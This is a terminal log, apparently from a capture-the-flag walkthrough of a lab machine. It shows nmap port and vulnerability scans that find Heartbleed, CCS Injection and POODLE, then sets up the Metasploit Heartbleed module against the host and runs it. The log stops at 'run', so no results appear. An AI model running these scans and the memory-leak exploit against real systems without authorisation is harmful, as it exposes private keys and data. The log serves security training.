┌──(mikannse㉿kali)-[~] └─$ sudo nmap --min-rate=10000 -p- 10.10.10.79 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 11:35 CST Warning: 10.10.10.79 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.79 Host is up (0.072s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds
┌──(mikannse㉿kali)-[~] └─$ sudo nmap -sT -sV -sC -O -p22,80,443 10.10.10.79 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 11:36 CST Nmap scan report for 10.10.10.79 Host is up (0.073s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA) | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA) |_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu)) | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US | Not valid before: 2018-02-06T00:45:25 |_Not valid after: 2019-02-06T00:45:25 |_http-server-header: Apache/2.2.22 (Ubuntu) |_ssl-date: 2024-09-03T03:27:14+00:00; -9m59s from scanner time. |_http-title: Site doesn't have a title (text/html). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Nokia N9 phone (Linux 2.6.32) (96%), Linux 3.0 (96%), Linux 2.6.32 - 3.5 (95%), Linux 3.2 (95%), Linux 2.6.38 - 3.0 (94%), Linux 2.6.38 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.5 (93%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 - 3.9 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: -9m59s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.95 seconds
┌──(mikannse㉿kali)-[~] └─$ sudo nmap --script=vuln -p22,80,443 10.10.10.79 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 11:38 CST Nmap scan report for 10.10.10.79 Host is up (0.43s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)' |_ /index/: Potentially interesting folder 443/tcp open https |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://www.openssl.org/news/secadv_20140407.txt | http://cvedetails.com/cve/2014-0160/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the "CCS Injection" vulnerability. | | References: | http://www.openssl.org/news/secadv_20140605.txt | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 |_ http://www.cvedetails.com/cve/2014-0224 | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.openssl.org/~bodo/ssl-poodle.pdf | https://www.imperialviolet.org/2014/10/14/poodle.html | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 |_ https://www.securityfocus.com/bid/70574 |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) | http-enum: | /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)' |_ /index/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 52.34 seconds
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/elasticsearch_memory_disclosure 2021-07-21 normal Yes Elasticsearch Memory Disclosure 1 \_ action: DUMP . . . Dump memory contents to loot 2 \_ action: SCAN . . . Check hosts for vulnerability 3 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure 4 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak 5 \_ action: DUMP . . . Dump memory contents to loot 6 \_ action: KEYS . . . Recover private keys from memory 7 \_ action: SCAN . . . Check hosts for vulnerability
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/ssl/openssl_heartbleed After interacting with a module you can manually set a ACTION with set ACTION 'SCAN'
msf6 > use 4 msf6 auxiliary(scanner/ssl/openssl_heartbleed) > options
Name Current Setting Required Description ---- --------------- -------- ----------- DUMPFILTER no Pattern to filter leaked memory before storing LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP inv ocation MAX_KEYTRIES 50 yes Max tries to dump key RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response RHOSTS yes The target host(s), see https://docs.metasploit.com /docs/using-metasploit/basics/using-metasploit.html RPORT 443 yes The target port (TCP) STATUS_EVERY 5 yes How many retries until key dump status THREADS 1 yes The number of concurrent threads (max one per host) TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Acc epted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRE S) TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description ---- ----------- SCAN Check hosts for vulnerability
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 10.10.10.79 rhost => 10.10.10.79 msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true verbose => true msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
